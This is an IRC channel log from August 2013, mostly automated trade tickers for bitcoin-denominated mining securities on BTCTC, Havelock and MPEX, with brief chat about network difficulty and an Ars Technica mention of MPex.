Aug 26 16:20:20 [BTCTC] [ASICMINER-PT] 1 @ 2.998 BTC [+] Aug 26 16:20:21 [BTCTC] [ASICMINER-PT] 1 @ 2.998 BTC [+] Aug 26 16:20:22 [BTCTC] [ASICMINER-PT] 2 @ 2.999 = 5.998 BTC [+] Aug 26 16:20:39 [BTCTC] [ASICMINER-PT] 3 @ 2.999 = 8.997 BTC [+] Aug 26 16:23:23 [BTCTC] [TAT.ASICMINER] 42 @ 0.0292 = 1.2264 BTC [+] Aug 26 16:24:53 [BTCTC] [LABCOIN] 10 @ 0.003359 = 0.0336 BTC [-] Aug 26 16:26:36 http://www.gstatic.com/hostedimg/bb9228ad218911b1_large Aug 26 16:26:40 who knows the chick ? Aug 26 16:28:30 [BTCTC] [LABCOIN] 1 @ 0.00351 BTC [+] Aug 26 16:29:20 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [+] Aug 26 16:31:09 [BTCTC] [ASICMINER-PT] 1 @ 2.999 BTC [+] Aug 26 16:31:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.029 = 0.145 BTC [-] Aug 26 16:31:32 [BTCTC] [ASICMINER-PT] 3 @ 2.999 = 8.997 BTC [+] Aug 26 16:31:34 [BTCTC] [ASICMINER-PT] 2 @ 2.999 = 5.998 BTC [+] Aug 26 16:31:35 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [+] Aug 26 16:31:36 [BTCTC] [ASICMINER-PT] 1 @ 3.05 BTC [+] Aug 26 16:31:37 [BTCTC] [ASICMINER-PT] 10 @ 3.05 = 30.5 BTC [+] Aug 26 16:31:38 [BTCTC] [ASICMINER-PT] 2 @ 3.05 = 6.1 BTC [+] Aug 26 16:32:45 [BTCTC] [TAT.ASICMINER] 3 @ 0.029 = 0.087 BTC [-] Aug 26 16:33:42 [BTCTC] [ACTIVEMINING] 1 @ 0.005185 BTC [+] Aug 26 16:33:43 [BTCTC] [ACTIVEMINING] 1 @ 0.005186 BTC [+] Aug 26 16:33:43 [BTCTC] [ACTIVEMINING] 12 @ 0.005193 = 0.0623 BTC [+] Aug 26 16:33:45 [BTCTC] [ACTIVEMINING] 50 @ 0.005194 = 0.2597 BTC [+] Aug 26 16:34:09 [BTCTC] [LABCOIN] 1 @ 0.00351 BTC [+] Aug 26 16:36:07 [BTCTC] [LABCOIN] 5 @ 0.003511 = 0.0176 BTC [+] Aug 26 16:37:23 [BTCTC] [LABCOIN] 8 @ 0.003511 = 0.0281 BTC [+] Aug 26 16:39:21 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 26 16:39:33 [BTCTC] [ASICMINER-PT] 1 @ 3.03 BTC [+] Aug 26 16:39:48 [BTCTC] [TAT.ASICMINER] 100 @ 0.0292 = 2.92 BTC [+] Aug 26 16:40:45 [BTCTC] [TAT.ASICMINER] 60 @ 0.0292 = 1.752 BTC [+] Aug 26 16:41:00 [BTCTC] [TAT.ASICMINER] 51 @ 0.0292 = 1.4892 BTC [+] Aug 26 16:41:41 [BTCTC] [TAT.ASICMINER] 4 @ 0.02928 = 0.1171 BTC [+] Aug 26 16:41:47 [HAVELOCK] [XBOND] 1 @ 0.00116 BTC [-] Aug 26 16:42:17 [BTCTC] [TAT.ASICMINER] 43 @ 0.0292 = 1.2556 BTC [-] Aug 26 16:42:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.0291 = 0.1455 BTC [-] Aug 26 16:42:28 [HAVELOCK] [XBOND] 2 @ 0.00116 = 0.0023 BTC [-] Aug 26 16:43:10 [BTCTC] [TAT.ASICMINER] 7 @ 0.02928 = 0.205 BTC [+] Aug 26 16:43:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.02928 = 0.1464 BTC [+] Aug 26 16:43:19 [BTCTC] [DMS.MINING] 1 @ 0.003332 BTC [-] Aug 26 16:43:42 [BTCTC] [LABCOIN] 5 @ 0.003504 = 0.0175 BTC [-] Aug 26 16:43:44 [BTCTC] [LABCOIN] 5 @ 0.003505 = 0.0175 BTC [+] Aug 26 16:43:45 [BTCTC] [LABCOIN] 20 @ 0.003506 = 0.0701 BTC [+] Aug 26 16:43:46 [BTCTC] [LABCOIN] 25 @ 0.003524 = 0.0881 BTC [+] Aug 26 16:43:46 [BTCTC] [LABCOIN] 100 @ 0.003525 = 0.3525 BTC [+] Aug 26 16:43:47 [BTCTC] [LABCOIN] 87 @ 0.003558 = 0.3095 BTC [+] Aug 26 16:43:48 [BTCTC] [LABCOIN] 21 @ 0.003559 = 0.0747 BTC [+] Aug 26 16:43:50 [BTCTC] [LABCOIN] 129 @ 0.003565 = 0.4599 BTC [+] Aug 26 16:44:27 [BTCTC] [BITVPS] 1 @ 0.002351 BTC [-] Aug 26 16:44:43 [BTCTC] [TAT.ASICMINER] 12 @ 0.02929 = 0.3515 BTC [+] Aug 26 16:45:13 [BTCTC] [LABCOIN] 4 @ 0.00356 = 0.0142 BTC [-] Aug 26 16:46:52 [BTCTC] [LABCOIN] 187 @ 0.003368 = 0.6298 BTC [-] Aug 26 16:47:11 [BTCTC] [TAT.ASICMINER] 3 @ 0.02928 = 0.0878 BTC [-] Aug 26 16:48:53 [MPEX] [S.MPOE] 2800 @ 0.00086562 = 2.4237 BTC [+] Aug 26 16:48:53 [MPEX] [S.MPOE] 9500 @ 0.00086652 = 8.2319 BTC [+] Aug 26 16:49:07 [BTCTC] [ASICMINER-PT] 1 @ 3.011 BTC [-] Aug 26 16:49:23 [BTCTC] [TAT.ASICMINER] 57 @ 0.02928 = 1.669 BTC [-] Aug 26 16:50:09 [BTCTC] [TAT.ASICMINER] 43 @ 0.02929 = 1.2595 BTC [+] Aug 26 16:50:33 [BTCTC] [ASICMINER-PT] 1 @ 3.01 BTC [-] Aug 26 16:50:36 [BTCTC] [DMS.MINING] 20 @ 0.003332 = 0.0666 BTC [-] Aug 26 16:50:51 [BTCTC] [LABCOIN] 85 @ 0.003545 = 0.3013 BTC [+] Aug 26 16:50:53 [BTCTC] [LABCOIN] 187 @ 0.003547 = 0.6633 BTC [+] Aug 26 16:51:09 [BTCTC] [DMS.SELLING] 8 @ 0.01225 = 0.098 BTC [+] Aug 26 16:51:11 [BTCTC] [DMS.SELLING] 30 @ 0.01224 = 0.3672 BTC [-] Aug 26 16:51:12 [BTCTC] [DMS.SELLING] 49 @ 0.01223 = 0.5993 BTC [-] Aug 26 16:51:45 [BTCTC] [TAT.ASICMINER] 36 @ 0.02929 = 1.0544 BTC [+] Aug 26 16:51:47 [HAVELOCK] [LABCO] 9 @ 0.00286 = 0.0257 BTC [-] Aug 26 16:51:50 [HAVELOCK] [LABCO] 31 @ 0.0028001 = 0.0868 BTC [-] Aug 26 16:53:00 [BTCTC] [TAT.ASICMINER] 18 @ 0.02929 = 0.5272 BTC [+] Aug 26 16:56:32 [HAVELOCK] [VTX] 3 @ 0.5900001 = 1.77 BTC [+] Aug 26 16:57:23 [BTCTC] [ASICMINER-PT] 1 @ 3.067 BTC [+] Aug 26 16:57:25 [BTCTC] [ASICMINER-PT] 1 @ 3.07 BTC [+] Aug 26 16:57:26 [BTCTC] [ASICMINER-PT] 5 @ 3.08 = 15.4 BTC [+] Aug 26 16:57:27 [BTCTC] [ASICMINER-PT] 1 @ 3.088 BTC [+] Aug 26 16:57:28 [BTCTC] [ASICMINER-PT] 1 @ 3.09 BTC [+] Aug 26 16:57:29 [BTCTC] [ASICMINER-PT] 1 @ 3.09 BTC [+] Aug 26 16:57:30 [BTCTC] [ASICMINER-PT] 21 @ 3.09 = 64.89 BTC [+] Aug 26 16:58:40 [BTCTC] [ASICMINER-PT] 1 @ 3.001 BTC [-] Aug 26 16:58:41 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 26 16:59:10 [BTCTC] [LABCOIN] 10 @ 0.003542 = 0.0354 BTC [-] Aug 26 16:59:25 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 26 16:59:34 [BTCTC] [LABCOIN] 10 @ 0.003537 = 0.0354 BTC [-] Aug 26 16:59:35 [BTCTC] [LABCOIN] 10 @ 0.003538 = 0.0354 BTC [+] Aug 26 16:59:36 [BTCTC] [LABCOIN] 5 @ 0.003544 = 0.0177 BTC [+] Aug 26 16:59:38 [BTCTC] [LABCOIN] 64 @ 0.003554 = 0.2275 BTC [+] Aug 26 17:07:33 [BTCTC] [TAT.ASICMINER] 41 @ 0.02929 = 1.2009 BTC [+] Aug 26 17:07:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0294 BTC [+] Aug 26 17:07:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0294 BTC [+] Aug 26 17:07:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.0294 = 0.147 BTC [+] Aug 26 17:08:42 [BTCTC] [TAT.ASICMINER] 27 @ 0.02949 = 0.7962 BTC [+] Aug 26 17:08:59 [BTCTC] [ASICMINER-PT] 1 @ 3.049 BTC [+] Aug 26 17:09:10 [HAVELOCK] [AM100] 10 @ 0.028 = 0.28 BTC [+] Aug 26 17:09:13 [HAVELOCK] [AM100] 9 @ 0.0281 = 0.2529 BTC [+] Aug 26 17:09:15 [HAVELOCK] [AM100] 20 @ 0.0282 = 0.564 BTC [+] Aug 26 17:09:17 [HAVELOCK] [AM100] 10 @ 0.0284 = 0.284 BTC [+] Aug 26 17:09:19 [HAVELOCK] [AM100] 5 @ 0.0284 = 0.142 BTC [+] Aug 26 17:09:21 [HAVELOCK] [AM100] 10 @ 0.0285 = 0.285 BTC [+] Aug 26 17:09:24 [HAVELOCK] [AM100] 36 @ 0.0288 = 1.0368 BTC [+] Aug 26 17:09:25 [BTCTC] [ASICMINER-PT] 1 @ 3.004 BTC [-] Aug 26 17:09:26 [BTCTC] [ASICMINER-PT] 1 @ 3.003 BTC [-] Aug 26 17:09:27 [BTCTC] [ASICMINER-PT] 1 @ 3.002 BTC [-] Aug 26 17:09:28 [BTCTC] [ASICMINER-PT] 2 @ 3 = 6 BTC [-] Aug 26 17:12:24 mircea_popescu: did you MPex was mentioned on Ars? Aug 26 17:12:30 see^ Aug 26 17:13:29 [BTCTC] [LABCOIN] 7 @ 0.003547 = 0.0248 BTC [-] Aug 26 17:16:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.02892 = 0.2892 BTC [-] Aug 26 17:16:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.02891 = 1.4455 BTC [-] Aug 26 17:16:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.0289 = 0.289 BTC [-] Aug 26 17:16:18 [BTCTC] [TAT.ASICMINER] 24 @ 0.02851 = 0.6842 BTC [-] Aug 26 17:16:50 [BTCTC] [ASICMINER-PT] 1 @ 3.045 BTC [+] Aug 26 17:17:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.02949 = 0.118 BTC [+] Aug 26 17:17:04 [BTCTC] [DMS.SELLING] 138 @ 0.01223 = 1.6877 BTC [-] Aug 26 17:19:37 [BTCTC] [LABCOIN] 5 @ 0.003544 = 0.0177 BTC [-] Aug 26 17:21:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.02945 = 0.1178 BTC [-] Aug 26 17:21:21 [BTCTC] [ASICMINER-PT] 1 @ 3.043 BTC [-] Aug 26 17:21:22 [BTCTC] [NASTY-PT] 10 @ 0.002279 = 0.0228 BTC [+] Aug 26 17:21:24 [BTCTC] [ASICMINER-PT] 1 @ 3.044 BTC [+] Aug 26 17:21:25 [BTCTC] [ASICMINER-PT] 1 @ 3.045 BTC [+] Aug 26 17:22:17 [HAVELOCK] [SDSTM] 1 @ 0.0035 BTC [+] Aug 26 17:24:51 [HAVELOCK] [XBOND] 1 @ 0.00115999 BTC [-] Aug 26 17:24:59 [BTCTC] [ASICMINER-PT] 1 @ 3.045 BTC [+] Aug 26 17:26:08 TomServo url Aug 26 17:26:10 [BTCTC] [DMS.SELLING] 113 @ 0.01223 = 1.382 BTC [-] Aug 26 17:28:23 [BTCTC] [DMS.MINING] 8 @ 0.003419 = 0.0274 BTC [+] Aug 26 17:28:55 [HAVELOCK] [AM100] 3 @ 0.0288 = 0.0864 BTC [+] Aug 26 17:29:14 .d Aug 26 17:29:15 65750060.14908 | Next Diff in 1707 blocks | Estimated Change: 6.9155% in 11d 0h 21m 59s Aug 26 17:29:36 that is getting high Aug 26 17:29:58 not really it was 7% yesterday Aug 26 17:30:01 ;;nethash Aug 26 17:30:02 523759.883804 Aug 26 17:30:11 [BTCTC] [TAT.ASICMINER] 6 @ 0.02945 = 0.1767 BTC [-] Aug 26 17:30:15 looks like hash power is settling Aug 26 17:30:17 i mean 65 million Aug 26 17:30:21 oh Aug 26 17:30:30 meh it was expected Aug 26 17:31:25 [BTCTC] [LABCOIN] 50 @ 0.003544 = 0.1772 BTC [-] Aug 26 17:31:36 [BTCTC] [LTC-ATF.B2] 5 @ 0.01043 = 0.0522 BTC [+] Aug 26 17:31:38 sure Aug 26 17:31:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.02947 = 0.2947 BTC [+] Aug 26 17:32:18 [BTCTC] [ASICMINER-PT] 1 @ 3.043 BTC [-] Aug 26 17:33:09 [BTCTC] [DMS.MINING] 240 @ 0.003342 = 0.8021 BTC [-] Aug 26 17:33:12 [BTCTC] [LABCOIN] 145 @ 0.003544 = 0.5139 BTC [-] Aug 26 17:33:13 [BTCTC] [LABCOIN] 20 @ 0.003457 = 0.0691 BTC [-] Aug 26 17:33:14 [BTCTC] [LABCOIN] 100 @ 0.00345 = 0.345 BTC [-] Aug 26 17:33:16 [BTCTC] [LABCOIN] 25 @ 0.003401 = 0.085 BTC [-] Aug 26 17:33:16 [BTCTC] [LABCOIN] 100 @ 0.0034 = 0.34 BTC [-] Aug 26 17:35:32 [MPEX] [S.MPOE] 1985 @ 0.00086539 = 1.7178 BTC [-] Aug 26 17:36:06 kakobrekla: http://arstechnica.com/business/2013/08/firm-says-online-gambling-accounts-for-almost-half-of-all-bitcoin-transactions/ Aug 26 17:36:11 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.001063 = 0.0074 BTC [-] Aug 26 17:37:08 Albeit a brief mention, still a first I think. Aug 26 17:40:13 [BTCTC] [DMS.SELLING] 4 @ 0.01275 = 0.051 BTC [+] Aug 26 17:40:18 [BTCTC] [LABCOIN] 1 @ 0.00354 BTC [+] Aug 26 17:42:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.02942 = 0.0883 BTC [-] Aug 26 17:43:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.02943 = 0.0883 BTC [+] Aug 26 17:43:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.02943 = 0.1472 BTC [+] Aug 26 17:43:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.02944 = 0.1472 BTC [+] Aug 26 17:43:56 [BTCTC] [TAT.ASICMINER] 34 @ 0.02944 = 1.001 BTC [+] Aug 26 17:44:11 [BTCTC] [DMS.MINING] 100 @ 0.00334 = 0.334 BTC [-] Aug 26 17:44:12 [BTCTC] [DMS.MINING] 49 @ 0.003332 = 0.1633 BTC [-] Aug 26 17:45:21 [BTCTC] [ASICMINER-PT] 1 @ 3.001 BTC [-] Aug 26 17:45:34 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 26 17:46:14 [BTCTC] [ASICMINER-PT] 2 @ 3.042 = 6.084 BTC [+] Aug 26 17:46:15 [BTCTC] [ASICMINER-PT] 4 @ 3.043 = 12.172 BTC [+] Aug 26 17:47:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.02939 = 0.3233 BTC [-] Aug 26 17:47:54 [BTCTC] [ASICMINER-PT] 1 @ 3.042 BTC [-] Aug 26 17:47:56 [BTCTC] [ASICMINER-PT] 2 @ 3.043 = 6.086 BTC [+] Aug 26 17:47:57 [BTCTC] [ASICMINER-PT] 1 @ 3.05 BTC [+] Aug 26 17:47:58 [BTCTC] [ASICMINER-PT] 1 @ 3.08 BTC [+] Aug 26 17:47:59 [BTCTC] [ASICMINER-PT] 2 @ 3.08 = 6.16 BTC [+] Aug 26 17:47:59 [BTCTC] [ASICMINER-PT] 2 @ 3.087 = 6.174 BTC [+] Aug 26 17:48:00 [BTCTC] [ASICMINER-PT] 2 @ 3.088 = 6.176 BTC [+] Aug 26 17:48:01 [BTCTC] [ASICMINER-PT] 1 @ 3.09 BTC [+] Aug 26 17:48:03 [BTCTC] [ASICMINER-PT] 4 @ 3.09 = 12.36 BTC [+] Aug 26 17:48:04 [BTCTC] [ASICMINER-PT] 2 @ 3.093 = 6.186 BTC [+] Aug 26 17:48:05 [BTCTC] [ASICMINER-PT] 3 @ 3.094 = 9.282 BTC [+] Aug 26 17:48:06 [BTCTC] [ASICMINER-PT] 3 @ 3.094 = 9.282 BTC [+] Aug 26 17:48:07 [BTCTC] [ASICMINER-PT] 1 @ 3.095 BTC [+] Aug 26 17:48:08 [BTCTC] [ASICMINER-PT] 1 @ 3.096 BTC [+] Aug 26 17:48:09 [BTCTC] [ASICMINER-PT] 1 @ 3.098 BTC [+] Aug 26 17:48:10 [BTCTC] [ASICMINER-PT] 5 @ 3.098 = 15.49 BTC [+] Aug 26 17:48:56 [BTCTC] [TAT.ASICMINER] 11 @ 0.02941 = 0.3235 BTC [+] Aug 26 17:48:56 [BTCTC] [TAT.ASICMINER] 24 @ 0.02942 = 0.7061 BTC [+] Aug 26 17:49:12 [BTCTC] [ASICMINER-PT] 1 @ 3.6 BTC [+] Aug 26 17:51:43 [BTCTC] [TAT.ASICMINER] 15 @ 0.02942 = 0.4413 BTC [+] Aug 26 17:53:14 [BTCTC] [LABCOIN] 1 @ 0.003398 BTC [-] Aug 26 17:53:38 [BTCTC] [DMS.MINING] 241 @ 0.003418 = 0.8237 BTC [+] Aug 26 17:54:28 .bait Aug 26 17:54:32 http://24.media.tumblr.com/tumblr_ly0rs1cWZy1r3aceeo1_1280.jpg Aug 26 17:54:49 [BTCTC] [DMS.MINING] 100 @ 0.003415 = 0.3415 BTC [-] Aug 26 17:54:51 [BTCTC] [DMS.MINING] 150 @ 0.003419 = 0.5129 BTC [+] Aug 26 17:57:15 [BTCTC] [DMS.SELLING] 1 @ 0.01274 BTC [-] Aug 26 17:57:17 [BTCTC] [DMS.SELLING] 26 @ 0.01275 = 0.3315 BTC [+] Aug 26 17:57:18 [BTCTC] [DMS.SELLING] 147 @ 0.01275 = 1.8743 BTC [+] Aug 26 17:58:51 [BTCTC] [FIMB] 273 @ 0.0105 = 2.8665 BTC [-] Aug 26 18:00:42 [BTCTC] [DMS.SELLING] 30 @ 0.01276 = 0.3828 BTC [+] Aug 26 18:00:44 [BTCTC] [DMS.SELLING] 170 @ 0.01276 = 2.1692 BTC [+] Aug 26 18:00:45 [BTCTC] [DMS.SELLING] 26 @ 0.01276 = 0.3318 BTC [+] Aug 26 18:02:02 [MPEX] [S.MPOE] 3815 @ 0.00086281 = 3.2916 BTC [-] Aug 26 18:03:42 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 26 18:04:08 [BTCTC] [ASICMINER-PT] 9 @ 3 = 27 BTC [-] Aug 26 18:04:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.02939 = 0.5878 BTC [-] Aug 26 18:04:31 [BTCTC] [TAT.ASICMINER] 401 @ 0.0294 = 11.7894 BTC [+] Aug 26 18:04:33 [BTCTC] [TAT.ASICMINER] 11 @ 0.0294 = 0.3234 BTC [+] Aug 26 18:06:43 [BTCTC] [LABCOIN] 10 @ 0.003409 = 0.0341 BTC [+] Aug 26 18:06:44 [BTCTC] [LABCOIN] 10 @ 0.003408 = 0.0341 BTC [-] Aug 26 18:06:44 [BTCTC] [LABCOIN] 20 @ 0.003406 = 0.0681 BTC [-] Aug 26 18:06:45 [BTCTC] [LABCOIN] 25 @ 0.003405 = 0.0851 BTC [-] Aug 26 18:06:46 [BTCTC] [LABCOIN] 100 @ 0.003404 = 0.3404 BTC [-] Aug 26 18:06:47 [BTCTC] [LABCOIN] 100 @ 0.003401 = 0.3401 BTC [-] Aug 26 18:06:49 [BTCTC] [LABCOIN] 400 @ 0.0034 = 1.36 BTC [-] Aug 26 18:06:55 [BTCTC] [ASICMINER-PT] 2 @ 3.092 = 6.184 BTC [+] Aug 26 18:06:56 [BTCTC] [ASICMINER-PT] 1 @ 3.093 BTC [+] Aug 26 18:07:17 [BTCTC] [DMS.SELLING] 2 @ 0.01276 = 0.0255 BTC [+] Aug 26 18:07:18 [BTCTC] [ASICMINER-PT] 3 @ 3.6 = 10.8 BTC [+] Aug 26 18:08:54 [MPEX] [S.MPOE] 2300 @ 0.00086652 = 1.993 BTC [+] Aug 26 18:08:56 [MPEX] [S.MPOE] 3350 @ 0.00086677 = 2.9037 BTC [+] Aug 26 18:09:29 [BTCTC] [LABCOIN] 9 @ 0.003399 = 0.0306 BTC [-] Aug 26 18:09:30 [BTCTC] [LABCOIN] 5 @ 0.003517 = 0.0176 BTC [+] Aug 26 18:09:31 [BTCTC] [LABCOIN] 20 @ 0.003518 = 0.0704 BTC [+] Aug 26 18:09:32 [BTCTC] [LABCOIN] 250 @ 0.003545 = 0.8863 BTC [+] Aug 26 18:09:33 [BTCTC] [LABCOIN] 1000 @ 0.003546 = 3.546 BTC [+] Aug 26 18:09:34 [BTCTC] [LABCOIN] 716 @ 0.003551 = 2.5425 BTC [+] Aug 26 18:14:00 [BTCTC] [BITVPS] 1 @ 0.002689 BTC [+] Aug 26 18:14:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.02948 BTC [+] Aug 26 18:15:17 [BTCTC] [ASICMINER-PT] 1 @ 3.004 BTC [-] Aug 26 18:15:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.02948 = 0.1769 BTC [+] Aug 26 18:15:37 [BTCTC] [TAT.ASICMINER] 18 @ 0.02949 = 0.5308 BTC [+] Aug 26 18:15:37 [BTCTC] [TAT.ASICMINER] 76 @ 0.0295 = 2.242 BTC [+] Aug 26 18:16:15 [BTCTC] [ASICMINER-PT] 2 @ 3.6 = 7.2 BTC [+] Aug 26 18:16:34 [BTCTC] [ASICMINER-PT] 1 @ 3.003 BTC [-] Aug 26 18:16:44 [BTCTC] [TAT.ASICMINER] 100 @ 0.0295 = 2.95 BTC [+] Aug 26 18:17:10 [BTCTC] [ACTIVEMINING] 2 @ 0.005249 = 0.0105 BTC [+] Aug 26 18:18:59 [BTCTC] [LABCOIN] 85 @ 0.003405 = 0.2894 BTC [-] Aug 26 18:19:01 [BTCTC] [LABCOIN] 5 @ 0.003403 = 0.017 BTC [-] Aug 26 18:19:50 [BTCTC] [LABCOIN] 17 @ 0.003404 = 0.0579 BTC [+] Aug 26 18:19:52 [BTCTC] [LABCOIN] 243 @ 0.003403 = 0.8269 BTC [-] Aug 26 18:22:01 [BTCTC] [LABCOIN] 20 @ 0.003402 = 0.068 BTC [-] Aug 26 18:25:47 [BTCTC] [LABCOIN] 50 @ 0.003401 = 0.1701 BTC [-] Aug 26 18:26:47 [BTCTC] [LABCOIN] 285 @ 0.00343 = 0.9776 BTC [+] Aug 26 18:27:19 [BTCTC] [ASICMINER-PT] 1 @ 3.002 BTC [-] Aug 26 18:27:26 [BTCTC] [ASICMINER-PT] 1 @ 3.001 BTC [-] Aug 26 18:27:33 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 26 18:27:42 [BTCTC] [ASICMINER-PT] 1 @ 2.991 BTC [-] Aug 26 18:27:45 [BTCTC] [ASICMINER-PT] 4 @ 2.99 = 11.96 BTC [-] Aug 26 18:27:46 [BTCTC] [ASICMINER-PT] 1 @ 2.98 BTC [-] Aug 26 18:27:48 [BTCTC] [ASICMINER-PT] 5 @ 2.974 = 14.87 BTC [-] Aug 26 18:27:50 [BTCTC] [ASICMINER-PT] 1 @ 2.974 BTC [-] Aug 26 18:27:55 [BTCTC] [ASICMINER-PT] 2 @ 3.091 = 6.182 BTC [+] Aug 26 18:28:19 [BTCTC] [ASICMINER-PT] 4 @ 3.09 = 12.36 BTC [-] Aug 26 18:28:19 [BTCTC] [ASICMINER-PT] 1 @ 3.091 BTC [+] Aug 26 18:28:21 [BTCTC] [ASICMINER-PT] 1 @ 3.092 BTC [+] Aug 26 18:28:22 [BTCTC] [ASICMINER-PT] 8 @ 3.093 = 24.744 BTC [+] Aug 26 18:28:23 [BTCTC] [ASICMINER-PT] 2 @ 3.093 = 6.186 BTC [+] Aug 26 18:28:24 [BTCTC] [ASICMINER-PT] 6 @ 3.094 = 18.564 BTC [+] Aug 26 18:28:25 [BTCTC] [ASICMINER-PT] 2 @ 3.095 = 6.19 BTC [+] Aug 26 18:28:26 [BTCTC] [ASICMINER-PT] 1 @ 3.098 BTC [+] Aug 26 18:28:27 [BTCTC] [ASICMINER-PT] 1 @ 3.099 BTC [+] Aug 26 18:28:28 [BTCTC] [ASICMINER-PT] 2 @ 3.099 = 6.198 BTC [+] Aug 26 18:28:28 [BTCTC] [ASICMINER-PT] 10 @ 3.1 = 31 BTC [+] Aug 26 18:28:29 [BTCTC] [ASICMINER-PT] 1 @ 3.1 BTC [+] Aug 26 18:28:31 [BTCTC] [ASICMINER-PT] 10 @ 3.1 = 31 BTC [+] Aug 26 18:28:32 [BTCTC] [ASICMINER-PT] 8 @ 3.1 = 24.8 BTC [+] Aug 26 18:28:52 [BTCTC] [ACTIVEMINING] 7 @ 0.00525 = 0.0368 BTC [+] Aug 26 18:28:54 [BTCTC] [ACTIVEMINING] 30 @ 0.005251 = 0.1575 BTC [+] Aug 26 18:28:57 [HAVELOCK] [SDSTM] 15 @ 0.00250003 = 0.0375 BTC [-] Aug 26 18:29:37 [BTCTC] [DMS.PURCHASE] 310 @ 0.01606 = 4.9786 BTC [+] Aug 26 18:29:57 [BTCTC] [TAT.ASICMINER] 13 @ 0.0295 = 0.3835 BTC [+] Aug 26 18:31:52 [HAVELOCK] [AM1] 2 @ 2.75 = 5.5 BTC [-] Aug 26 18:32:44 [BTCTC] [LABCOIN] 465 @ 0.00343 = 1.595 BTC [+] Aug 26 18:32:45 [BTCTC] [LABCOIN] 313 @ 0.003401 = 1.0645 BTC [-] Aug 26 18:32:46 [BTCTC] [LABCOIN] 1000 @ 0.0034 = 3.4 BTC [-] Aug 26 18:32:47 [BTCTC] [LABCOIN] 255 @ 0.0034 = 0.867 BTC [-] Aug 26 18:33:30 [BTCTC] [DMS.MINING] 9 @ 0.003419 = 0.0308 BTC [+] Aug 26 18:33:52 [BTCTC] [DMS.SELLING] 40 @ 0.01274 = 0.5096 BTC [-] Aug 26 18:35:55 [BTCTC] [LABCOIN] 35 @ 0.003387 = 0.1185 BTC [-] Aug 26 18:36:05 [BTCTC] [DMS.SELLING] 200 @ 0.01274 = 2.548 BTC [-] Aug 26 18:36:33 [BTCTC] [LABCOIN] 90 @ 0.00339 = 0.3051 BTC [+] Aug 26 18:36:46 [BTCTC] [DMS.SELLING] 150 @ 0.01274 = 1.911 BTC [-] Aug 26 18:37:23 [BTCTC] [ASICMINER-PT] 1 @ 3.099 BTC [-] Aug 26 18:37:38 [BTCTC] [LABCOIN] 1 @ 0.00339 BTC [+] Aug 26 18:37:40 [BTCTC] [BASIC-MINING] 3 @ 0.2202 = 0.6606 BTC [+] Aug 26 18:37:49 [HAVELOCK] [XBOND] 299 @ 0.00115999 = 0.3468 BTC [-] Aug 26 18:37:59 [HAVELOCK] [XBOND] 997 @ 0.00116 = 1.1565 BTC [+] Aug 26 18:38:22 [HAVELOCK] [XBOND] 109 @ 0.00117 = 0.1275 BTC [+] Aug 26 18:38:42 [BTCTC] [TAT.ASICMINER] 8 @ 0.0295 = 0.236 BTC [+] Aug 26 18:38:45 [BTCTC] [DMS.MINING] 186 @ 0.003419 = 0.6359 BTC [+] Aug 26 18:38:46 [BTCTC] [DMS.MINING] 70 @ 0.003419 = 0.2393 BTC [+] Aug 26 18:38:48 [BTCTC] [DMS.MINING] 1 @ 0.003419 BTC [+] Aug 26 18:38:49 [BTCTC] [DMS.MINING] 988 @ 0.003425 = 3.3839 BTC [+] Aug 26 18:38:50 [BTCTC] [DMS.MINING] 255 @ 0.003428 = 0.8741 BTC [+] Aug 26 18:38:51 [BTCTC] [DMS.MINING] 534 @ 0.003428 = 1.8306 BTC [+] Aug 26 18:38:51 [BTCTC] [DMS.MINING] 701 @ 0.003428 = 2.403 BTC [+] Aug 26 18:38:52 [BTCTC] [DMS.MINING] 700 @ 0.003429 = 2.4003 BTC [+] Aug 26 18:38:53 [BTCTC] [DMS.MINING] 1000 @ 0.003429 = 3.429 BTC [+] Aug 26 18:38:55 [HAVELOCK] [XBOND] 84 @ 0.001171 = 0.0984 BTC [+] Aug 26 18:39:06 [HAVELOCK] [XBOND] 200 @ 0.001172 = 0.2344 BTC [+] Aug 26 18:40:13 [HAVELOCK] [XBOND] 200 @ 0.001173 = 0.2346 BTC [+] Aug 26 18:40:22 [HAVELOCK] [XBOND] 200 @ 0.001174 = 0.2348 BTC [+] Aug 26 18:40:38 [HAVELOCK] [XBOND] 200 @ 0.001175 = 0.235 BTC [+] Aug 26 18:41:16 [BTCTC] [LABCOIN] 25 @ 0.003401 = 0.085 BTC [+] Aug 26 18:41:18 [BTCTC] [LABCOIN] 100 @ 0.0034 = 0.34 BTC [-] Aug 26 18:42:13 [BTCTC] [TAT.ASICMINER] 53 @ 0.0295 = 1.5635 BTC [+] Aug 26 18:42:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0298 BTC [+] Aug 26 18:42:15 [BTCTC] [TAT.ASICMINER] 150 @ 0.0298 = 4.47 BTC [+] Aug 26 18:42:17 [BTCTC] [TAT.ASICMINER] 96 @ 0.02995 = 2.8752 BTC [+] Aug 26 18:45:39 [BTCTC] [DMS.MINING] 1 @ 0.0035 BTC [+] Aug 26 18:45:46 [BTCTC] 